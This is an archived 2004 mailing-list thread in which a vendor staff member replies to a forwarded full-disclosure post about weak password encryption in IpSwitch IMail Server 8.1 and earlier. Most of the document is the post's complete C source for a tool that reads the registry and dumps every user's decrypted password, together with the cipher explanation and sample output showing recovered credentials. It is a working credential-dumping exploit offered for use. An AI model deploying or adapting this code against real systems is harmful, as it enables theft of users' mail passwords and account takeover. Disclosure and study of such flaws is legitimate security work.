Re: [IMail Forum] [Fwd: IpSwitch IMail Server <= ver 8.1 User Password Decryption]

Eric Shanbrom [Ipswitch] Tue, 17 Aug 2004 07:06:14 -0700

This assumes that the intruder has access to the IMail machine's
registry...IMHO if this is so I would think you have bigger problems than
just grabbing passwords..


Eric S

----- Original Message ----- 
From: "Russ Uhte" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Tuesday, August 17, 2004 9:56 AM
Subject: [IMail Forum] [Fwd: IpSwitch IMail Server <= ver 8.1 User Password
Decryption]


> Forwarded from bugtraq/full-disclosure.  Thought it may be of some
> interest here.
>
> -Russ
>
> -------- Original Message --------
> Subject: IpSwitch IMail Server <= ver 8.1 User Password Decryption
> Date: Mon, 16 Aug 2004 23:18:53 +0600 (KGST)
> From: Adik <[EMAIL PROTECTED]>
> To: [EMAIL PROTECTED]
> CC: [EMAIL PROTECTED]
>
> Hi fellaz,
>
> IpSwitch IMail Server version up to 8.1 uses weak encryption algorithm to
> encrypt its user passwords. Have a look at attached proof of concept tool,
> which will decrypt user password from local machine instantly.
>
> ---
> G:\xploits\imail_decrypt>
> G:\xploits\imail_decrypt>imailpwdump -d
>
> --= [ IpSwitch IMail Server User Password Decrypter ver 1.1] =--
>
> (c) 2004 by Adik ( netmaniac [at] hotmail.KG )
>
>
>
>   DOMAIN: [ 192.168.65.129 ]
>
>   DOMAIN: [ win2k ]
> ------------------------------------------------------------------------
>   FullName: aselka
>   Email: [EMAIL PROTECTED]
>   Username: aselka
>   Password: p3ace
> ------------------------------------------------------------------------
>   FullName: brazilia
>   Email: [EMAIL PROTECTED]
>   Username: brazilia
>   Password: mysupersecretpassword
> ------------------------------------------------------------------------
>   FullName: networkadmin
>   Email: [EMAIL PROTECTED]
>   Username: networkadmin
>   Password: c00l
> ------------------------------------------------------------------------
>   FullName: System Administrator
>   Email: [EMAIL PROTECTED]
>   Username: root
>   Password: password
>
> Total: 4 Accounts
>
>   Total: 1 Domains, 4 Accounts
>
> ---
>
> ciao,
>
> Adik
>
>
>
> -- 
> Russ Uhte, CCNP
> Network Administrator
> Richmond Power & Light
> Parallax Systems Division
> 2000 US 27 South
> Richmond, IN 47374
> USA
> Richmond: 765.973.7348
> Toll-free: 888.962.3770
> Cell:  765.993.3944
>


----------------------------------------------------------------------------
----


>
>
/***************************************************************************
**********************
> * IpSwitch IMail Server <= ver 8.1 User Password Decryption
> *
> * by Adik < netmaniac[at]hotmail.KG >
> *
> * IpSwitch IMail Server uses weak encryption algorithm to encrypt its user
passwords. It uses
> * polyalphabetic Vegenere cipher to encrypt its user passwords. This
encryption scheme is
> * relatively easy to break. In order to decrypt user password we need a
key. IMail uses username
> * as a key to encrypt its user passwords. The server stores user passwords
in the registry under the key
> *
"HKEY_LOCAL_MACHINE\SOFTWARE\IpSwitch\IMail\Domains\<domainname>\Users\<user
name>\Password".
> * Before decrypting password convert all upper case characters in the
username to lower case
> * characters. We use username as a key to decrypt our password.
> * In order to get our plain text password, we do as follows:
> * 1) Subtract hex code of first password hash character by the hex code of
first username character.
> *    The resulting hex code will be our first decrypted password
character.
> * 2) Repeat above step for the rest of the chars.
> *
> * Look below, everythin is dead simple ;)
> * eg:
> *
> * USERNAME: netmaniac
> * PASSWORDHASH: D0CEE7D5CCD3D4C7D2E0CAEAD2D3
> * --------------------------------------------
> *
> * D0 CE E7 D5 CC D3 D4 C7 D2 E0 CA EA D2 D3 <- password hash
> * - 6E 65 74 6D 61 6E 69 61 63 6E 65 74 6D 61 <- hex codes of username
> * n  e  t  m  a  n  i  a  c  n  e  t  m  a <- username is a key
> * -----------------------------------------
> * 62 69 73 68 6B 65 6B 66 6F 72 65 76 65 72 <- hex codes of decrypted
password
> * b  i  s  h  k  e  k  f  o  r  e  v  e  r <- actual decrypted password
> *
> *
> * pwdhash_hex_code username_hex_code decrypted_password
> * ------------------------------------------------------------------
> * D0 - 6E (n) = 62 (b)
> * CE - 65 (e) = 69 (i)
> * E7 - 74 (t) = 73 (s)
> * D5 - 6D (m) = 68 (h)
> * CC - 61 (a) = 6B (k)
> * D3 - 6E (n) = 65 (e)
> * D4 - 69 (i) = 6B (k)
> * C7 - 61 (a) = 66 (f)
> * D2 - 63 (c) = 6F (o)
> * E0 - 6E (n) = 72 (r)
> * CA - 65 (e) = 65 (e)
> * EA - 74 (t) = 76 (v)
> * D2 - 6D (m) = 65 (e)
> * D3 - 61 (a) = 72 (r)
> * ------------------------------------------------------------------
> *
> * I've included a lil proggie to dump all the usernames/passwords from
local machine's registry.
> * Have fun!
> * //Send bug reports to netmaniac[at]hotmail.KG
> *
> * Greets to: my man wintie from .au, Chintan Trivedi :), jin yean ;),
Morphique
> *
> * [16/August/2004] Bishkek
>
****************************************************************************
**********************/
>
>
> //#include "stdafx.h"
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
> #include <ctype.h>
> #include <windows.h>
> #define snprintf _snprintf
> #pragma comment(lib,"advapi32")
> #define ALLOWED_USERNAME_CHARS "A-Z,a-z,0-9,-,_,."
> #define MAX_NUM 1024 //500
> #define DOMAINZ "Software\\IpSwitch\\IMail\\Domains"
> #define VER "1.1"
> #define MAXSIZE 100
>
> int total_accs=0;
> int total_domainz=0,total_domain_accs=0;
>
/*OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO
OOOOOOOOO*/
> void greetz()
> {
> printf( "\n\t--= [ IpSwitch IMail Server User Password Decrypter ver %s]
=--\n\n"
> "\t\t (c) 2004 by Adik ( netmaniac [at] hotmail.KG )\n\n\n",VER);
> }
>
/*OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO
OOOOOOOOO*/
> void usage()
> {
> printf(
"------------------------------------------------------------------------\n"
);
> printf( " Imailpwdump [-d] -- Dumps IMail Server user/pwds from local
registry\n\n"
> " Imailpwdump [username] [passwordhash] -- User/PwdHash to decrypt\n\n"
> " eg: Imailpwdump netmaniac D0CEE7D5CCD3D4C7D2E0CAEAD2D3\n");
> printf(
"------------------------------------------------------------------------\n"
);
>
> }
>
/*OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO
OOOOOOOOO*/
> void str2hex(char *hexstring, char *outbuff)
> {
> unsigned long tmp=0;
> char tmpchr[5]="";
> memset(outbuff,0,strlen(outbuff));
> if(strlen(hexstring) % 2)
> {
> printf(" Incorrect password hash!\n");
> exit(1);
> }
> if(strlen(hexstring)>MAXSIZE)
> {
> printf(" Password hash is too long! \n");
> exit(1);
> }
> for(unsigned int i=0, c=0; i<strlen(hexstring); i+=2, c++)
> {
> memcpy(tmpchr,hexstring+i,2);
> tmp = strtoul(tmpchr,NULL,16);
> outbuff[c] = (char)tmp;
> }
> }
>
/*OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO
OOOOOOOOO*/
> void str2smallcase(char *input)
> {
> if(strlen(input)>MAXSIZE)
> {
> printf(" Username too long! \n");
> return;
> }
> for(unsigned int i=0;i<strlen(input);i++)
> {
> if(isalnum(input[i]) || input[i] == '-' || input[i]=='_' || input[i]=='.')
> input[i] = tolower(input[i]);
> else
> {
> printf(" Bad characters in username!\n Allowed characters:
%s\n",ALLOWED_USERNAME_CHARS);
> return;
> }
> }
> }
>
/*OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO
OOOOOOOOO*/
> void populate(char *input,unsigned int size)
> {
> char tmp[MAX_NUM]="";
> unsigned int strl = strlen(input);
> strcpy(tmp,input);
> //netmaniacnetmaniacnetman
> for(unsigned int i=strlen(input),c=0;i<size;i++,c++)
> {
> if(c==strl)
> c=0;
> input[i] = tmp[c];
> }
> input[i]='\0';
> }
>
/*OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO
OOOOOOOOO*/
> void imail_decrypt(char *username, char *pwdhash,char *outbuff)
> {
> //adik 123456
> //adikbek 123
> if(strlen(pwdhash) <= strlen(username) )
> {
> memset(outbuff,0,sizeof(outbuff));
> for(unsigned int i=0;i<strlen(pwdhash);i++)
> outbuff[i] = (pwdhash[i]&0xff) - (username[i]&0xff);
> outbuff[i]='\0';
> }
> }
>
/*OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO
OOOOOOOOOO*/
> void get_usr_pwds(char *subkey,char *usr)
> {
> long res;
> HKEY hPwdKey;
> char username[MAXSIZE]="";
> char passwdhash[MAXSIZE*2]="", passwd[MAXSIZE]="",clearpasswd[MAXSIZE]="";
> char fullname[MAXSIZE]="";
> char email[MAXSIZE]="";
> DWORD lType;
> DWORD
passwdhashsz=sizeof(passwdhash)-1,fullnamesz=MAXSIZE-1,emailsz=MAXSIZE-1;
>
> res = RegOpenKeyEx(HKEY_LOCAL_MACHINE,subkey,0,KEY_ALL_ACCESS,&hPwdKey);
> if(res!=ERROR_SUCCESS)
> {
> printf(" Error opening key %s! Error #:%d\n",subkey,res);
> exit(1);
> //return;
> }
>
>
if(RegQueryValueEx(hPwdKey,"Password",0,&lType,(LPBYTE)passwdhash,&passwdhas
hsz)!= ERROR_SUCCESS)
> {
> RegCloseKey(hPwdKey);
> return;
> }
>
if(RegQueryValueEx(hPwdKey,"FullName",0,&lType,(LPBYTE)fullname,&fullnamesz)
!= ERROR_SUCCESS)
> {
> RegCloseKey(hPwdKey);
> return;
> }
>
if(RegQueryValueEx(hPwdKey,"MailAddr",0,&lType,(LPBYTE)email,&emailsz)!=ERRO
R_SUCCESS)
> {
> RegCloseKey(hPwdKey);
> return;
> }
>
>
> str2smallcase(usr);
> strncpy(username,usr,sizeof(username)-1);
> str2hex(passwdhash,passwd);
> // adik 1234567
> // adik 12
> if(strlen(passwd)>strlen(username))
> populate(username,strlen(passwd));
> imail_decrypt(username,passwd,clearpasswd);
>
> printf(
"------------------------------------------------------------------------\n"
> " FullName:\t %s\n"
> " Email:\t\t %s\n"
> " Username:\t %s\n"
> " Password:\t %s\n",
> fullname,email,usr,clearpasswd);
> total_accs++;
> RegCloseKey(hPwdKey);
> }
>
/*OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO
OOOOOOOOO*/
> void dump_registry_pwds()
> {
> HKEY hKey,hUserKey;
> DWORD domRes=0,usrRes=0, domlen=0,userlen=0,domIndex=0,userIndex=0;
> FILETIME ftime;
> char domain[150]="";
> char user[150]="";
> char tmpbuff[MAX_NUM]="";
> char usrtmpbuff[MAX_NUM]="";
> domRes = RegOpenKeyEx(HKEY_LOCAL_MACHINE,DOMAINZ,0,KEY_ALL_ACCESS,&hKey);
> if(domRes!=ERROR_SUCCESS)
> {
> printf(" Error opening key '%s'!\n IMail not installed?? Error
#:%d\n",DOMAINZ,domRes);
> exit(1);
> }
> do
> {
> domlen=sizeof(domain)-1;
> domRes=RegEnumKeyEx(hKey,domIndex,domain,&domlen,NULL,NULL,NULL,&ftime);
> if(domRes!=ERROR_NO_MORE_ITEMS)
> {
> printf("\n DOMAIN:\t [ %s ]\n",domain);
> userIndex=0;
> total_accs=0;
> snprintf(tmpbuff,sizeof(tmpbuff)-1,"%s\\%s\\Users",DOMAINZ,domain);
> usrRes =
RegOpenKeyEx(HKEY_LOCAL_MACHINE,tmpbuff,0,KEY_ALL_ACCESS,&hUserKey);
> if(usrRes==ERROR_SUCCESS)
> {
> //adik
> do
> {
> userlen=sizeof(user)-1;
>
usrRes=RegEnumKeyEx(hUserKey,userIndex,user,&userlen,NULL,NULL,NULL,&ftime);
> if(usrRes!=ERROR_NO_MORE_ITEMS)
> {
>
snprintf(usrtmpbuff,sizeof(usrtmpbuff)-1,"%s\\%s\\Users\\%s",DOMAINZ,domain,
user);
> get_usr_pwds(usrtmpbuff,user);
> }
> userIndex++;
> }
> while(usrRes!=ERROR_NO_MORE_ITEMS);
> RegCloseKey(hUserKey);
> printf("\n\t Total:\t %d Accounts\n",total_accs);
> total_domain_accs += total_accs;
> total_domainz++;
> }
> domIndex++;
> }
> }
> while(domRes != ERROR_NO_MORE_ITEMS);
> RegCloseKey(hKey);
> //total_domains += dom
> printf("\n Total:\t %d Domains, %d
Accounts\n",total_domainz,total_domain_accs);
>
> }
>
/*OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO
OOOOOOOOO*/
> void decrypt_usr_pass(char *usr,char *passwd)
> {
> char username[MAX_NUM]="";
> char passwordhash[MAX_NUM]="";
> char outputbuff[250]="";
>
> str2smallcase(usr);
> strncpy(username,usr,sizeof(username)-1);
> str2hex(passwd,passwordhash);
>
printf("--------------------------------------------------------------------
----\n");
> printf( " Username:\t\t %s\n"
> " Passwordhash:\t\t %s\n",usr,passwd);
> if(strlen(passwordhash)>strlen(username))
> populate(username,strlen(passwordhash));
>
> imail_decrypt(username,passwordhash,outputbuff);
> printf(" Decrypted passwd:\t %s\n",outputbuff);
>
printf("--------------------------------------------------------------------
----\n");
> }
>
/*OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO
OOOOOOOOO*/
> void main(int argc, char *argv[])
> {
> greetz();
>
> if(argc ==2 && strncmp(argv[1],"-d",2)==0 )
> {
> //dump passwd from registry
> dump_registry_pwds();
> }
> else if(argc == 3 && strncmp(argv[1],"-d",2)!=0)
> {
> //decrypt username passwd
> decrypt_usr_pass(argv[1],argv[2]);
> }
> else
> {
> usage();
> return;
> }
>
> // ThE eNd
>
> }
>
/*OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO
OOOOOOOOO*/
>
>


To Unsubscribe: http://www.ipswitch.com/support/mailing-lists.html
List Archive: http://www.mail-archive.com/imail_forum%40list.ipswitch.com/
Knowledge Base/FAQ: http://www.ipswitch.com/support/IMail/

Re: [IMail Forum] [Fwd: IpSwitch IMail Server <= ver 8.1 User Password Decryption]

Reply via email to